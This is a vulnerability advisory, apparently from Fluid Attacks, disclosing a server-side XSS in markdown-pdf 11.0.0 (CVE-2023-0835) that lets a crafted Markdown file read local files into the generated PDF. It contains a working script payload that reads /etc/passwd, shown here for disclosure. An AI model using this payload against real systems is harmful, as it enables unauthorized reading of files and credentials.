markdown-pdf 11.0.0 - Local File Read via Server Side XSS
Summary
| Name | markdown-pdf 11.0.0 - Local File Read |
| Code name | |
| Product | markdown-pdf |
| Affected versions | Version 11.0.0 |
| State | Public |
| Release date | 2023-04-10 |
Vulnerability
| Kind | Server Side XSS |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| CVSSv3.1 Base Score | 7.5 |
| Exploit available | Yes |
| CVE ID(s) |
Description
markdown-pdf version 11.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the Markdown content entered by the user.
Vulnerability
This vulnerability occurs because the application does not validate that the Markdown content entered by the user is not malicious.
Exploitation
To exploit this vulnerability, we only need to send the following malicious Markdown to markdown-pdf:
Exploit.md
<script> // Path Disclosure document.write(window.location); // Arbitrary Local File Read xhr = new XMLHttpRequest; xhr.onload=function(){document.write((this.responseText))}; xhr.open("GET","file:///etc/passwd"); xhr.send(); </script>
Thus, when markdown-pdf parses the malicious Markdown, it will return the local file specified in the generated PDF.
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-0835 to refer to this issue from now on.
System Information
-
Version: electron-pdf 11.0.0
-
Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://www.npmjs.com/package/markdown-pdf/
Timeline
2023-02-20
Vulnerability discovered.
2023-02-20
Vendor contacted.
2023-02-20
Vendor replied acknowledging the report.
2023-04-10
Public Disclosure.
